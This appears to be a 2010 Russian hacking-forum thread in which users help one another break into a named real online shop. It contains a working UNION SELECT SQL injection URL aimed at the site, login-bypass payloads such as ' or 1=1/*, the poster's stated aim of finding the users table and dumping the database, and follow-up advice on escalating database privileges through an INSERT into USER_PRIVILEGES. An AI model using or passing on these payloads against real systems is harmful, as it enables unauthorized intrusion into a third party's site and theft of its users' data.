18.01.2010, 16:12
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
Провел на форуме:
812087
Репутация:
129
|
|
Сообщение от mff
Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает ?
Спасибо.
Да это sql-injection в SQL операторе LIMIT
|
|
|
18.01.2010, 16:23
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009
Репутация:
18
|
|
для mff:
http://www.etiket-shop.ru/pages.php?Page=65&nID=-132'+union+select+1,2,3,@@version,5--+
Последний раз редактировалось Alf0x0ns; 18.01.2010 в 16:25..
|
|
|
|
18.01.2010, 17:15
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от mff
Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает ?
Спасибо.
Limit стоит после order by. Потому если file_priv N, то ничего не сделаешь. Второй вариант, как уже описали выше, найти другую скулю 
Сообщение от mailbrush
При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица.
что-то я обкурился
|
|
|
|
18.01.2010, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть |
|
|
|
20.01.2010, 13:00
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от mff
Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть Возможен auth bypass,не фильтруються переменные логина и пароля....
Я не смотрел,но может поможет в дальнейшем.
ЗЫ:login -
' or 1=1/*
admin'/*
Последний раз редактировалось S00pY; 20.01.2010 в 13:05..
|
|
|
|
18.01.2010, 17:53
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009
Репутация:
18
|
|
версия Mysql ниже 5, а точней 4.0.26-log
Вариант перебор таблиц и полей!
|
|
|
|
18.01.2010, 17:55
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Alf0x0ns, ага, уже перебирал. Может кто словариком задобрит?
|
|
|
|
19.01.2010, 14:26
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
Код:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе?
спасибо v1d0qz.
Последний раз редактировалось wkar; 19.01.2010 в 21:06..
|
|
|
|
19.01.2010, 20:54
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от wkar
Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
Код:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе? Столько ошибок в одной строчке не в обиду, но больше читай мануалы, это совет
user_privileges брать в кавычки не нужно, это ж табличка. UPDATE нужно взять в такие кавычки, чтобы он не определялся как оператор. Там где tracker и localhost нужно отслешировать кавычки, чтобы они не рвали запрос.
INSERT INTO USER_PRIVILEGES VALUES('tracker\'@\'localhost',null, `UPDATE`,YES)
Последний раз редактировалось v1d0qz; 19.01.2010 в 21:06..
|
|
|
|
19.01.2010, 21:09
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
А каким еще способом можно увеличить привилегии юзера бд.
Система фрибсд 7.2.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [NiGHT]DarkAngel](/avatars/avatar15948.jpg?1837232){kind=avatar}
Похожие темы
Комбинированный вид
